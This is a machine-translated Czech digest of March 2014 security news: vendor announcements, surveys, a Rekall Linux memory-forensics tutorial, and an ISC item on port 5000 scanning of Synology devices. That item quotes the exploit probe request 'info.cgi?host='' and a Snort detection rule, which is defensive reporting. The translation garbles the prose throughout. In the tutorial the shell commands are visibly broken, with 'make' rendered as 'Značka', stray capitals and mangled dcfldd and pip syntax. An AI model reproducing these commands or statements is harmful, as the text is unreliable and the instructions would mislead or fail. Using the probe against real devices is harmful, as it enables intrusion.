OPSWAT oznámila oficiální vydání ZAŘÍZENÍ, cloud-based síťovou platformu pro správu zabezpečení, která nabízí pokročilou detekci hrozeb pro vzdálené uživatele prostřednictvím identifikace potenciálních hrozeb, že stávající antivirový software může mít zmeškané nebo nemůže napravovat.

ZAŘÍZENÍ poskytuje jistotu zabezpečení zařízení s využitím více než 40 anti-malware motory od předních výrobců, jako Avira, BitDefender, ESET a mnoho dalších skenování vzdálených zařízení pro aktivní malware. Je to také vypadá na log ohrožení stávajícího antivirového softwaru identifikovat hrozby, které nemohou být sanace nebo že uživatel opakovaně stahování. To také umožňuje lepší přehled a kontrolu nad aplikacemi pro ochranu koncových bodů a jejich stav umožňuje administrátorům rychle odhalit a napravovat dodržování problémy. Powered by OPSWAT je OESIS rámce, může detekovat a nápravě bezpečnostních aplikací, včetně antiviru, firewallu, šifrování pevného disku a mnoho dalších. ZAŘÍZENÍ také sleduje nežádoucí aplikace, jako jsou sdílení souborů veřejnosti, a stav systému, včetně toho, zda je uživatel chráněn heslem. KOLA mohou být integrovány do zabezpečených přístupových řešení poskytují další vrstvu výkonu pro vzdálené uživatele. Vzdálení uživatelé se snaží získat přístup k síti přes bezpečnostní třetí-party řešení, mohou být testovány na malware a hodnoceny za dodržování zásad podmíněnosti. Kromě toho mohou odborníci na bezpečnost využít expanzivní pohodové API pro integraci ZAŘÍZENÍ do vzdálené monitorování a správu platformy pro větší viditelnost a ovladatelnost koncových bodů. Uživatelé mohou spravovat až 25 přístrojů zdarma po registraci na účet OPSWAT Gears. Pro uživatele se zájmem sleduje více než 25 zařízení, navštivte naši kontaktní stránku se dostat do kontaktu se zástupcem OPSWAT.


OpenID Foundation spouští OpenID Connect standard
7.3.2014 Bezpečnost
OpenID Foundation dnes oznámila, že její členství ratifikoval standard OpenID Connect. OpenID Connect je efektivní, jednoduchý způsob, jak aplikace pro outsourcing podnikání podepsaly uživatelů do specializovaných operátorů totožnosti služeb, tzv. Identity Providers (IDP). A co je nejdůležitější, aplikace i nadále řídit své vztahy se svými zákazníky, ale outsourcing drahé, rizikové podnikání ověření totožnosti na ty lépe vybavené profesionálně řídit.
 

To bylo provedeno po celém světě internetových a mobilních společností, včetně Google, Microsoft, Deutsche Telekom, salesforce.com, Ping Identity, Nomura Research Institute, mobilních operátorů a dalších podniků a organizací. To bude postaveno do komerčních produktů a realizovány v open-source knihovny pro globální nasazení. "Google sází na velký OpenID Connect, protože je to jednoduché pro vývojáře k pochopení a usnadňuje sdružování s poskytovateli identity. To také chrání uživatele pouze o sdílení informací o účtu, aby uživatelé nám explicitně říct, "řekl Eric Sachs, Group Product Manager identity. "K dnešnímu dni, Google nabízí podporu pro OpenID Connect jako poskytovatele identity a jsme rádi, že viděli, jak bude tato norma využívají Internet jednodušší pro uživatele, aniž byste museli zadávat hesla." formalizaci OpenID Connect jako otevřený globální standard umožňuje vývojářům , podniky, vlády, accreditors, a další zúčastněné strany k vybudování vytvoření a přijetí specifických pro určitá odvětví OpenID Connect profilů do 2.014 plánů a priorit. OpenID Foundation, Open Identity Exchange, a GSMA spolupracují na pilotních a poznávacích projektů a 2014 začne testovat, jak implementace OpenID Connect může zlepšit on-line výběr, efektivitu, bezpečnost a soukromí. Proč OpenID Connect? Stěží uplyne týden, aniž další reportáž o nějaké internetové čelí organizace trpí škodlivé porušení dat, často včetně hesel, někdy číslování v desítkách milionů. Neustálé bubnování datových porušení poškozuje pověst organizací "Internet jako celek, a zejména důvěra uživatelů internetu po celém světě. OpenID Connect poskytuje jednoduchý, standardní způsob, jak zadávat místa a aplikační přihlášení do systému provozovatele, kteří neustále investují do sofistikované Ověřování infrastruktury a kteří mají specializované dovednosti potřebné k bezpečnému řízení Sign-in a odhalit zneužívání. OpenID Connect staví na základech úspěšných open identity a bezpečnostních norem, jako je OAuth 2.0 a TLS (také známý jako SSL, nebo "https"). Jako výsledek, to má tu výhodu, je to, že je v podstatě jednodušší pro vývojáře a realizovat nasazení než jiné identifikační protokoly, což umožňuje jednodušší nasazení, aniž by byla obětována bezpečnost.


Linux Memory Dump s Rekallu

7.3.2014 Incidenty

Paměť dumpingu reakce na incidenty není nic nového, ale od té doby se uzamčena přímý přístup k paměti (/ dev / mem) na Linuxu, jsem měl špatné zkušenosti dumping paměti. I obvykle skončí shazovat server asi 60 procent času při sběru dat s Fmem.

Nová verze Linux paměti dumpingu utility Rekallu (předchozí s názvem Winpmem) nedávno vyšel. Já jsem testoval to na nejnovější verzi Ubuntu a RedHat EL 5 a ještě narazit na žádné problémy s kolekce.

Pokud máte to štěstí, že prostředí, ve kterém máte skupiny serverů se stejnými úrovněmi náplasti, měli byste spustit následující kroky na non-kompromitaci serveru. Navíc, pokud je ohrožena systém VM, můžete naklonovat, a provádět tyto akce na klonu. Ujistěte se, že budete sbírat všechny ostatní těkavé údaje (MACtimes, lsof, PS atp ..), než se výpis paměti, protože to může ještě způsobit nestabilitu systému a nechcete přijít o data.

Příprava k odběru
Nainstalujte Linux Kernel záhlaví
Ubuntu
> Sudo apt-get install linux-headers-server zip
CentOS / Redhat
> Yum install kernel-headers GCC

Stáhněte si a kompilace Rekallu
Když spustíte makefile, automaticky se vytvoří část profilu na serveru. To bude muset být kopírován mimo server pro analýzu.
> Wget http://downloads.rekall.googlecode.com/git/Linux/linux_pmem_1.0RC1.tgz
> Tar-zxvf linux_pmem_1.0RC1.tgz
> Cd linux
> Značka

Poznámka: Pro Redhat / CentOS systému, budete muset nastavit proměnnou Makefile KHEADER.

Zkopírujte tento soubor do svého analýzu stroje volatilita pod volatility adresáři / plugins / překrývání / linux /.
Načíst ovladače jádra
> Sudo insmod pmem.ko
> Sudo lsmod | grep pmem
pmem 12680 0

Sbírejte paměti
Teď, když je disk vložen, nové zařízení je k dispozici / dev / pmem. Chceme kopírovat paměti na externí zařízení / akcii.
Počet položek v {} je třeba změnit na mimořádné události, aby byly užitečné pro analýzu
> Dcfldd if = / dev / pmem bs = 512 conv = noerror, sync of = / {USBDRIVE} / mount / {servername.date}. Memory.dd hash = md5, sha256 hashlog = / {USBDRIVE} / {servername.date }. memory.dd-hash.log

Uvolnění ovladače
> Sudo rmmod pmem.ko
Analýza pomocí Rekallu
Nyní, že kolekce je dokončena, musíme být schopni zkoumat výpis stavu paměti. Zkopírujte obraz paměti do analýzy pracovní stanici.

Nainstalujte Rekallu
> Sudo apt-get install python-pip python-dev
> Sudo pip nainstalovat Rekallu

Build Rekallu profil
Nyní je třeba vytvořit profil, který bude pracovat s Rekallu. Převést soubor, který byl zkopírován ze serveru a název něco užitečného pro budoucí analýzu.
> Rekal.py convert_profile 3.5.0-45-generic.zip Ubuntu3.5.0-45-generic.zip
> Rekal.py - profil ./Ubuntu3.5.0-45-generic.zip-f / media / mem.dd pslist

Chcete-li zadat interaktivní shell, nechcete přidat plugin na příkazovém řádku
> Rekal.py - profil ./Ubuntu3.5.0-45-generic.zip-f / media / mem.dd

Chcete-li zobrazit dostupné pluginy, použijte interaktivní shell:
> Rekal.py info [tab] [tab]

plugins.arp plugins.check_idt plugins.convert_profile plugins.dwarfparser plugins.info plugins.lsof plugins.null plugins.psaux plugins.vmscan
plugins.banner plugins.check_modules plugins.cpuinfo plugins.fetch_pdb
.....

Chcete-li získat více informací o konkrétním plugin používat? po Earth název
mem 12:38:31> plugins.pslist?

Některé z více užitečných pluginů jsou:
plugins.bash-hledá historie bash
plugins.check_modules-List načíst moduly
plugins.dmesg - shromažďuje dmesg vyrovnávací paměti
plugins.lsof
plugins.netstat
plugins.pslist

Volitelné (Chcete-li použít volatilita pro analýzu)
Jsem strávil mnoho času na to, ale volatilita nebude moci používat Rekall výchozí profil. Můžete také provést níže uvedené kroky a přečtěte si výpis paměti volatility. Hádám, že je zapotřebí pouze malé změny v souboru, ale já jsem kopal hlouběji v tomto okamžiku.

> Sudo apt-get install dwarfdump
> Wget https://volatility.googlecode.com/files/volatility-2.3.1.tar.gz
> Tar-zxvf volatilitu 2.3.1.tar.gz
> Cd volatility-2.3.1/tools/linux
> Značka
> Zip Ubuntu {Kernel ver}. Zip. / Module.dwarf / boot/System.map- `uname-r`

Pro více informací o Rekallu
http://docs.rekall.googlecode.com/git/tutorial.html

Pro více informací o nestabilitě analýzy Linux
https://code.google.com/p/volatility/wiki/LinuxMemoryForensics

Tom Webb


Port 5000 provoz a šňupat podpis

7.3.2014 Bezpečnost

ISC Reader James Lay zachytil záhadný portu 5000, provoz a pokud nám kopii paketů a odfrknutím podpis. Díky James! Vaše úžasné!

Provoz je skenování TCP port 5000. Po navázání spojení odešle "GET / Webman / info.cgi? Host = '"

Zdá se, že skenování Synology DiskStation Manager zařízení, která jsou citlivá na odlehlé kódu exection exploit zveřejněna v říjnu 2013. V současné době je Metasploit modul k dispozici pro zranitelnosti.

Díky Jamesovi na následující Snort podpisu.

upozornění tcp $ EXTERNAL_NET any -> $ HOME_NET 5000 (msg: "SERVER-WebApp Synology DiskStation Manager odražené XSS pokus přes UPnP", průtok: to_server, založena, obsah: "/ Webman / info.cgi | 3f | host ="; fast_pattern : pouze, http_uri, metadata: politika vyrovnaného ips pokles, politika připojení-ips pokles, politika bezpečnostní-ips pokles, reference: url, ? www.scip.ch/en/ vuldb.10255 , classtype: Snažíte-admin, sid: 10000130, rev: 1 ;)

Následujte mě na Twitteru: @ markbaggett

Existuje několik šancí k zaregistrujte se SANS Python programovacím kurzu. Kurz začíná od samého počátku, za předpokladu, že nevíte nic o programování nebo Python. Kurz je self chodil učení a my pokrýt základy, než začneme stavební nástroje, které můžete použít ve své příští bezpečnosti angažmá. Zamilujete si ho! Připojte se mi Python pro penetraci testerů v Reston VA březnu 17-21 nebo SANSFire v Baltimore června 23-27.

http://www.sans.org/event/northern-virginia-2014/course/python-for-pen-testers

http://www.sans.org/event/sansfire-2014/course/python-for-pen-testers


CSA up ante na virtuální Hackathon
6.3.2014 Kongresy
Cloud Security Alliance (CSA) dnes oznámila, že zvyšoval ante, protože nikdo zatím nebyl schopen proniknout Software Defined Perimeter (SDP) sítě, protože soutěž začala v pondělí.

Pro virtuální Hackathon, se registrovaní účastníci z celého světa, byl dán IP adresy cílového souborového serveru, stejně jako SDP komponenty je chrání. To v podstatě simuluje "" zasvěcených útok "- po vzoru reálného světa prostředí -. Jak na privátním cloudu a veřejné cloudové infrastruktury Účastníci mají také přístup k referenčním SDP systému se naučit, jak systém funguje naplánovat svůj útok. Hackathon je postaven na veřejném cloudu bez zvláštní ochrany, s výjimkou těch, poskytuje Software Defined obvodu. Pomáhá ověřit koncepci, že softwarové komponenty, může poskytnout tolik ochranu před síťovými útoky jsou fyzické systémy. První účastník úspěšně zachytit cílovou informace o chráněném serveru je obdrží hrazenou cestu do Black Hat USA 2014, jakož i na DEF CON 22. konference (původně to bylo jen DEF CON), včetně vzduchu a hotel, který se konal v Las Vegas 6-10 08. 2014. "Věříme, že SDP je zásadní změna v tom, jak se blížíme zajišťující sítě a jsou vyzývány, že nikdo nemá byli schopni proniknout prototyp ještě, "řekl Bob Flores, soudce případě, bývalý technický ředitel CIA, a prezident a generální ředitel společnosti Applicology Incorporated. "Chceme vyzvat všechny zainteresované strany, kdekoli na světě, pro testování bezpečnosti SDP sítě." Software Defined Perimeter (SDP) Iniciativa je CSA projekt zaměřený na rozvoj architektury pro zajištění spotřební zařízení, cloud infrastruktury, jakož i jako "internet věcí", s využitím cloud pro vytvoření vysoce zabezpečené a důvěryhodné end-to-end sítí mezi jakýmikoli adresovatelných subjekty IP. Úplná pravidla soutěže a registrace jsou k dispozici na zde . Hackaton bude trvat až do patnáct hodin PST 27. února


Spotřebitelé chtějí soukromí, ale nemusí využít opt-out technologií
6.3.2014 Bezpečnost
Většina spotřebitelů si starosti o tom, jak obchodníci využít své osobní údaje, ale 79 procent je více pravděpodobné, že poskytnutí osobních údajů, aby to, co považují za "důvěryhodné značky," podle nové studie chování spotřebitelů od SDL.

Průzkum také ukázal, že zatímco spotřebitelé nejsou spokojeni s tím, že "sledovat" v kamenném obchodě, mají tendenci nečetl zásady ochrany osobních údajů značky ", nebo přijmout opatření, aby opt-out, web sledování postupů. Studie zkoumal více než 4000 spotřebitelů ve Spojených . státy, Velká Británie a Austrálie shrnutí klíčových zjištění patří následující:

Spotřebitelé odměna důvěryhodné značky: Globálně, 79 procent respondentů je větší pravděpodobnost, že poskytnutí osobních údajů na "důvěryhodné" značky. Zjištění zdůrazňuje potřebu značek využívajících digitální marketing rozvíjet důvěru a pochopit, jaké informace jsou spotřebitelé ochotni vyměnit se značkou.
Ochrana osobních údajů naráží na odpor: Celkově 62 procent respondentů starat o tom, jak jsou obchodníci používají své osobní údaje. Výsledky naznačují, kulturu odolnosti proti sdílení dat on-line.
Starší spotřebitelé obávat více: Ve Spojených státech, 59 procent spotřebitelů mezi věky 18 a 29. obav o ochraně osobních údajů ve srovnání s 71 procent ve věku 45 a 60 mezi. Tam je menší zájem o ochraně osobních údajů celkově ve Velké Británii (48 procent v mladší generaci, 63 procent starší), zatímco australské spotřebitelů odráží méně generační propast (60 procent mladší, 66 procent starší).
Spotřebitelé, kteří jsou ochotni podělit se některé detaily: Z položek, které spotřebitelé jsou nejvíce ochotni se podělit, pohlaví, věk a příjem na vrcholu seznamu. Nicméně, jméno manžela, seznamy rodiny a přátel a čísla sociálního pojištění jsou věci, které většina spotřebitelů nebude sdílet se značkami.
Spotřebitelé odmítají in-store sledování: Z těch respondentů, kteří mají smartphonu, 76 procent nejsou spokojeni s sledování prodejci v obchodě pohyby pomocí smartphonu a bezplatné Wi-Fi připojení na internet.
Spotřebitelé nejsou pomocí funkce ochrany osobních údajů: Zatímco spotřebitelé mají obavy o tom, jak se s jejich údaji nakládá, 72 procent globálních respondentů zřídka nebo nikdy nepoužívejte "Do Not Track" nebo "Incognito" rysy, které by umožnily, aby opt-out sledování webových stránek .
Spotřebitelé přeskočit webových zásady ochrany osobních údajů: Celkově 65 procent zřídka nebo nikdy nečetl webové stránky zásadách ochrany osobních údajů před nákupem. Čtenáři nejvíce aktivní politiky jsou v Austrálii - kde 44 procent vždy nebo často číst drobné písmo.


McAfee rozšiřuje komplexní ochranu před hrozbami
6.3.2014 Ochrany
Na konferenci RSA , McAfee oznámila rozšířené schopnosti najít, zmrazit, a opravit pokročilé hrozby rychleji vyhrát boj proti vyspělých a úhybných cílených útoků.

Součástí připojeného přístupu McAfee Security, McAfee Komplexní ochrana před hrozbami řešení těsně váže a akcie hrozbách a pracovní postupy napříč koncovými body, sítě a cloud. Poskytuje ochranu, výkon a provozní úspory, které není možné z bodových výrobků, které nejsou určeny k optimalizaci bezpečnosti a řízení rizik jako funkce IT a nést zatížení manuálních integrace. Od loňského roku McAfee má lepší protiopatření k dispozici zákazníci a přidány nové analýzy, kontext a orchestrace plně integrovat a automatizovat procesy na ochranu hrozba.

Odhaluje více než 800 milionů pokročilých síťových únikové metody: Next Generation Firewall detekuje škodlivý provoz, který se pokusil zamaskovat sebe tím, že rozdělení na kousky, které se pohybují v různých protokolů prostřednictvím různých vrstev OSI zásobníku. Nyní, Firewall McAfee Next Generation může komunikovat s připojeným platformu zabezpečení vzdělávat koncové body a další bezpečnostní síť výrobky o těchto událostech.
Více informací o malware: McAfee Threat Defense Advanced kombinuje dobrou pověst, a emulace v reálném čase obrany s in-hloubkové statické kódu a dynamické, malware analýzy (tzv. sandboxu) poskytovat nejpodrobnější hodnocení a údaje o klasifikaci malware. Integrace s McAfee Threat Intelligence Exchange můžete sdílet všechny tyto informace a navíc dynamický soubor a IP pověst, prevalenci a malware řídit pult-reakce a vzdělávat každou komponentu zabezpečení v podnikovém prostředí, rozpoznat a zablokovat vznikající a cílené hrozby.
Najdi, zmrazení, a opravit během několika milisekund: Na rozdíl od jiných tzv. sandboxu technologií, může McAfee Threat Defense Advanced přímo přijímat soubory pro analýzu z a odeslat výsledky na koncový bod sítě a systémy řízení, využití Security Connected platformu pro optimalizaci pokročilou detekci a analýzu malware a zastavit malware v jeho stopách a to bez času a úsilí vynaložené na integraci.
Pokračování rozšířit své komplexní řešení ochrany před hrozbami, McAfee nedávno oznámila McAfee Threat Intelligence Exchange, který podílí na lokální i globální informace hrozba zpravodajských a bezpečnostních produktů v rámci celého podniku do jednoho soudržného integrovaného bezpečnostního systému odstranit mezeru mezi setkání a omezení pokročilých cílených útoků. Schopnost rychle na místě a předjímat pokročilé hrozby je nyní obchodní derivační, protože společnosti se snaží chránit své duševní vlastnictví a zajistit zákazníkům, že jejich data jsou v bezpečí. Připojeno strategie McAfee Security integruje data a pracovních postupů pro automatické odpovědi. Inteligence Threat sdílené mezi sítí a koncový bod pomáhá McAfee protiopatření, aby okamžitě vypnout příkaz-a-kontrolní komunikace a karanténní narušených systémů. Například Security Platform McAfee Network můžete použít návod od McAfee Enterprise Security Manager blokovat komunikaci s infikovanými hostiteli.


Trh Správa identit vztah k vyšší než 50 miliard dolarů do roku 2020
6.3.2014 Kriminalita
ForgeRock dnes oznámila, že řízení vztahů identity (IRM) na trhu, zaměřená na správu interakce se zákazníky napříč libovolné zařízení nebo životního prostředí, bude vyšší než 50 miliard dolarů do roku 2020.

Tento vysoký růst trhu trajektorie odráží rostoucí potřebu efektivní IRM řešení, jak CIO přesun investic z interních projektů identity se zaměřením na "držet věci" na masivní externí projekty totožnosti zaměřených na zvýšení zapojení zákazníků a zpeněžit tyto příležitosti. identit služby musí být v místě bez ohledu na odvětví - maloobchod, finance, pojišťovnictví, zdravotnictví, státní správy, cloud služby, vzdělávání - s cílem rozšířit obchodní dosah přes sociální, mobilní, oblačnosti a internetu věcí. Podle sítí obří Cisco, odhadem 8,7 mld. věci byly připojení k Internetu v roce 2012, očekává se růst na 50 miliard připojených k Internetu věcí v roce 2020. ForgeRock odhaduje, že každý připojený k Internetu věcí (PC, tablet, mobilní telefon, auto, lednička, TV, atd.) budou vyžadovat služby identit tak, aby rozhodnutí o přístupu uživateli v reálném čase na základě kontextu (umístění, IP adresa, známé zařízení, atd.). Vzhledem k tomu, internet věcí (Internet věcí) roste, ForgeRock očekává nárůst počtu žádostí slouží každé zařízení, hnací zvýšení příjmů totožnosti na zařízení -. Přibližně 50 miliard dolarů na celkových příležitosti "Oracle, IBM a CA jsou starší prodejci při jde o identitu "řekl Scott McNealy, spoluzakladatel a bývalý generální ředitel společnosti Sun Microsystems a poradce / investor ForgeRock. "Oracle ujít velkou příležitost využít na open source platformě Sun a CA a IBM se neotevřely své identity platformy soutěžit v moderní éře otevřených, interoperabilních software. ForgeRock je další generace, open-source platforma Identity Relationship Management postaven na rozsahu a spolehlivosti technologie Sun telco třídy. Všichni víme, jak tyto příběhy končí - lidstvo vítězí nad každou jednotlivou proprietární dodavatele. ForgeRock je vybudování nové generace platformy pro lidstvo. " Na oslavu obrovskou příležitost, ForgeRock dnes překvapil RSA konference účastníků s flash mob, který upozornil na rostoucí význam identity s olovem ve zprávě "Nikdo staví do rohu identitu , "hravě odkazem na hit klasický film," Dirty Dancing ".

Skupina, složená ze zaměstnanců ForgeRock, dobrovolníků a profesionálních tanečníků podobně, provádí na ulicích mimo Moscone Center několikrát, tančí na mashup hudby od "Dirty Dancing" a "Muži v černém", zatímco RSA účastníci sešli vidět to, co se děje. "ForgeRock vize je transformovat trhů usnadněním zvýšený přístup k zákazníkům a partnerům i když naše příští generace IRM platformě," řekl Mike Ellis, generální ředitel, ForgeRock. "Jsme svědky vážné narušení v průmyslu jako organizace roll-out více dynamické služby pro zákazníky, vyhlídky a dodavateli, které reagují v reálném čase informace o totožnosti uživatele a kontextu této interakce s uživatelem."


Zdarma nástroj vám pomůže odrazit většinu kybernetických útoků
6.3.2014 Nástroje | KyberWar
Dnes na konferenci RSA Qualys oznámila, že spolupracuje s SANS Institute a Rady o kybernetické bezpečnosti vydat nový bezplatný nástroj, který pomůže organizacím realizovat Top 4 Critical Security Controls odrazit útoky. nový nástroj , pomáhá organizacím rychle určit, zda na PC v jejich prostředí, jsou řádně prováděny na ovládací prvky Top 4 kritické zabezpečení, které Rada na základě odhadů kybernetické bezpečnosti může pomoci společnostem zabránit 85% z kybernetických útoků. "Qualys Top 4 nástroj je velmi elegantní a efektivní řešení, které pomáhá i malé a velké podniky zjistit, jak odolné jsou na dnešních pokročilých hrozeb, "řekl Jonathan Trull, CISO pro stát Colorado." To je přesně ten typ veřejno-soukromého partnerství naše země potřebuje k řešení kybernetické útoky ohrožují naši ekonomiku a kritické infrastruktury. " Postaveno na QualysGuard Cloud Platform, nová Top 4 cloud služeb pomáhá firmám snadno a rychle zjistit, zda Windows PC v jejich prostředí, zavedli Top 4 ovládací prvky pro: 1. Aplikace Whitelisting - pouze umožňuje schválený software ke spuštění. 2. Aplikační záplatování - udržování aplikace, plug-iny a další software aktuální. 3. OS Instalace oprav - udržování operační systémy v aktuálním stavu pomocí nejnovějších oprav. 4. Minimalizace oprávnění správce -. zabránit škodlivému softwaru v provádění tiché změny IT administrátorům pak můžete použít zpráv z bezplatný nástroj pro sledování koncové body, které nejsou v souladu, a uplatňovala nezbytná opatření, aby byly odolnější vůči útokům. "Síla kritické bezpečnostních kontrol, které odrážejí kombinaci znalosti skutečných útoků a účinné obrany z odborníků, kteří mají rozsáhlé znalosti o současných hrozbách, "řekl Philippe Courtot, předseda představenstva a generální ředitel společnosti Qualys. "Postavili jsme to cloud službu ve spolupráci s SANS Institute a Rady kybernetické bezpečnosti, které pomohou organizacím zajistit, aby se tyto ovládací prvky jsou na svém místě a jako výsledek identifikace počítačů v jejich prostředí, které vyžadují okamžitou pozornost."


Zdarma cloud anti-spam e-mailové služby pro malé a střední podniky
6.3.2014 Bezpečnost
Halon Security oznámila Inumbo.com, smlouva, zdarma, pay-as-you-go cloud anti-spam e-mailovou službu pro malé a střední podniky. emailová služba je poháněn podnikové třídy anti-spam řešení společnosti určené pro hosting, datové centrum, a poskytovatelů cloud služeb. Inumbo.com nevyžaduje žádnou smlouvu nebo up-front investice a je zdarma až pro 10 uživatelů.

Obsahuje halonů je snadný otevřené API pro rychlou integraci ze strany poskytovatelů služeb a integrátorů, s možností hybridního řešení pro klienty, kteří nevyžadují plnou cloud nasazení. Inumbo.com offers datových center na různých místech po celém světě, který umožňuje uživatelům svobodu vybrat si nejlepší, nejbezpečnější místo pro ukládání a zpracování jejich citlivá data při plnění jejich požadavků na dodržování předpisů. služba běží na Google Compute Engine a Rackspace Cloud servery pro téměř nekonečnou škálovatelnost a poskytuje otevřené API pro rychlou integraci ze strany integrátorů a poskytovatelů služeb. Průkopnická Doména Based Authentication zpráv, zpráv a shody (DMARC) technologie chrání proti falšování a phishingových útoků, které jsou populární zbraně pro hackery dnes. Halon Security podporuje komerční i open-source platformy s vylepšení rychlosti na jeho řešení, které, ve srovnání s jeho konkurenti, využívá hardware efektivněji a snižuje náklady. Mezi další funkce patří podpora IPv6. "Bezpečnost by neměla být drahé a komplikované. Naším cílem v Halon zabezpečení je, aby bezpečnost tak jednoduché, jak je to možné, aby všechny podniky mohou chránit svá data, "řekl Jonas Falck, Halon Bezpečnostní ředitel. "Malé a střední podniky a poskytovatelé podobně potřebují robustní, ale bezbolestné řešení pro řešení vybuchující množství zákazníků spam."


Špatné zabezpečení dat návyky spotřebitelů, by měla bát zaměstnavatele
6.3.2014 Zranitelnosti
Spotřebitelé nejsou získávání údajů o jejich osobní notebooky nebo stolní počítače správně, pokud vůbec, podle výsledků průzkumu Harris Poll zadala WinMagic. a pouhých 14 procent z těch, kteří vlastní notebook nebo stolní počítač šifrování svých osobních počítačích, a více než čtyři z deseti (44 procent), nejsou vyzváni při spouštění svého počítače zadat heslo.

Většina z těch, kteří vlastní notebook, stolní počítač nebo mobilní zařízení, tvrdí, že jejich osobní e-maily (62 procent), osobní fotografie a videa (54 procent) by byl ohrožen, pokud jejich osobní notebook, desktop nebo mobilní zařízení, byly ztraceny nebo ukradeny. Téměř čtyři z deseti (38 procent) by ztratil své bankovní údaje. "Jsem-li IT manažer nebo C na úrovni výkonné, musím předpokládat, pracovníky ve své firmě nechápu, jak zabezpečit firemní data, na základě mého čtení výsledků tohoto průzkumu, "řekl Mark Hickman, COO v WinMagic. "Koncepce šifrování-jen failsafe způsob, jak zabezpečit informace v klidu, vše je ale naprosto cizí pro spotřebitele, i když téměř čtyřicet procent z nich, aby data citliví jako bankovnictví informace o svých osobních notebooků či stolních počítačů." Další závěry expertů WinMagic čerpat z výsledků:

Práce produkt v ohrožení: Zaměstnavatelé by si měli uvědomit, že podle průzkumu, 15 procent z těch, kteří vlastní notebook, stolní počítač nebo mobilní zařízení, říkají obsah související s prací by byl ohrožen, pokud jejich notebook, stolní počítač nebo mobilní zařízení byly ukradeny nebo ztraceny , a pouze 14 procent z těch, kteří vlastní notebook nebo stolní počítač šifrování svých strojů. Pracovní ztrátě dat na jakémkoliv počítači, ať už společnost vlastněná nebo ne-klade společnost na riziko porušování shody, potřeby pro zveřejnění narušení bezpečnosti, a dalších zákonem stanovených činností, jako jsou drahé pokuty.
A / V znamená-OK mnohé: 71 procent z těch, kteří vlastní notebook nebo stolní počítač, aby firewall a / nebo anti-virus software aktuální informace o svých strojích. Tato ochrana představuje naprosté minimum, a výsledek šetření by mohlo naznačovat, rozšířený omyl, že anti-virus software je dostatečně zabezpečit stroje.
Dobře inzerované heslo osvědčených postupů nenásleduje: Pod třetina (31 procent) z těch, kteří vlastní notebook nebo stolní počítač říká, že "pravidelně měnit" svá hesla na jejich osobní notebooku nebo stolním počítači. Vzhledem k tomu, kolikrát jsou spotřebitelé připomněl změnit svá hesla, jako je nízké procento je alarmující.
Průzkum byl proveden on-line v USA, u 2047 dospělých ve věku 18 a starší, z nichž 2009 vlastnit notebook / stolní počítač. WinMagic nabízí eBook IT dotčeným o spotřebitelských zlozvyků odhalil výsledků průzkumu manažerů. EBook obsahuje doporučené postupy pro zabezpečení podnikových dat a školit pracovníky, a můžete si je stáhnout zde (nutná registrace).


Nová éra velkých řízení rizik údaje
6.3.2014 Bezpečnost
Agiliance oznámila RiskVision 7, která doly petabajtů dat provozních a bezpečnostních rizik pro řízení téměř v reálném čase workflow, inteligence a analýzy jízdních obchodní dopad a výkon.

Organizace působící v dynamicky se měnícím rizika ekosystému, vyznačující se tím, kybernetických útoků na bring-vaše-vlastní-zařízení (BYOD) a hrozby pro organizační dodavatelských řetězců. Mezitím, houbaření vládní rámců, jako NIST Cybersecurity zkoumat zastaralé, rizik a správy posouzení na základě postupů na základě manažerské názor. To vytváří naprosto nezbytné, aby se strategicky sladit cíle s analýzou dat řízený rizik z obchodních jednotek, dodavatelů, stejně jako cloud a datových center operací na optimalizaci rizik inteligenci, priorit, sanace a zprávy o auditu. V září 2013 Gartner bezpečnosti a řízení rizik Summit v Londýně, analytik Gartneru Neil MacDonald představil transformační, kontextově založené, velký přístup dat. On říkal, "Kontext je rozhodující pro soustružení obrovské množství bezpečnostních dat do žalovatelné vhled a identifikaci těch věcí, které představují největší riziko v organizaci. Organizace by měly požadovat konkrétní plány ukázat, jak jsou prodejci přidat aplikaci, identitu, a místní povědomí o svých produktech. " Teď RiskVision 7 rozpoutá definující průlomů ve velkém řízení rizik údaje, včetně: k operačnímu riziku případů použití:

Business Process připojení - Nový RiskVision objekt rámec, který umožňuje náročné datové záznamy v rozmezí od desítek tisíc až miliony, přes ERP, finanční, personální, ratingové, platby, dodavatelského řetězce, nebo jiné vlastní nebo třetích stran obchodní aplikace. Odkazy operačních rizik v podnikání pro případy použití, jako je dodavatelského řetězce, protistrany a obchodní odolnosti rizika, zmírnění multi-národních regulačních obavy týkající se procesů řízení.
Operační riziko Workflow - Nový RiskVision logický rámec, který nabízí dynamické datové pracovní postupy zefektivnit auditů operačního rizika doručením žaloby do správných oblastí, ve správný čas. Tento model je rozšiřitelný na všechny potřeby operačního rizika, např. AML, Basel II, FCPA, atd. Podporuje více než 20.000 lékařů, umožňuje operativně-efektivní využití zdrojů, a umožňuje současný personál více času pro analýzy rizik a řízení auditu.
Pro bezpečnostní rizika případů použití:
Cyber ​​Systems Modeling - sbírka virtualizovaných a fyzických aktiv, aplikací, databází, identity a místa na korelují data z bezpečnosti a IT nástrojů, vytváření sanačních opatření na agregované úrovni, že priority opatření ke zmírnění rizika a reakce.
Mobile Data Korelace - atributy dat Mobilní subjekt skóre riziko korelace OS a aplikací, hrozba kanály a uživatelské identity vně a uvnitř firemní firewall, před a po připojení zařízení k síti. Připravuje organizaci řídit nové a nechráněné ohrožení vysoké riziko vektor - Rogue aplikace vstupují do podnikových sítí prostřednictvím mobilních zařízení.
Pro všechny případy užití:
Anywhere, Anytime Analytics - dotazníky HTML 5-založené, seznamy volání, analýzy rizik, a ad-hoc zprávy nyní k dispozici na všech přenosných zařízení, jako jsou notebooky, tablety a chytré telefony - kdekoliv, kdykoliv. Umožňuje organizacím analyzovat velké datové sady rizik a zprovoznit automatizaci procesu rozhodování na základě rizik pro uživatele mimo compliance, bezpečnosti a IT.
Grafická vizualizace - Auto-diagramů složité pracovní postupy ve snadno vidět a interaktivních pohledů. Rozšiřitelná na grafické vizualizace organizační hierarchie a podnikových architektur zahrnujících vztahy datových rizika. Umožňuje obchodní přijetí uživateli sofistikovanějších systémů pracovních postupů, klasifikace majetku, dědické a propagace.
"Agiliance vyhýbá status quo v oblasti řízení rizik tím, že nahradí manažerské názor a taktické poradenství s účelovým, velký roztok dat pro zákazníky a partnery pro správu výkonnosti podniku," řekl Joe Fantuzzi, prezident a generální ředitel společnosti Agiliance. "Moderní řízení rizik vyžaduje data v reálném čase a obchodní soběstačnost, takže majitelé riziko může reagovat na obchodní, rady a požadavky regulátora na včasné a přesné módy. RiskVision 7 kroužků v novém roce s velkým řízení a značek rizik údaje začátek konce malého řízení shody údajů. " RiskVision 7 je k dispozici ihned. Ceny začínají na 25000 dolarů za aplikace za rok.


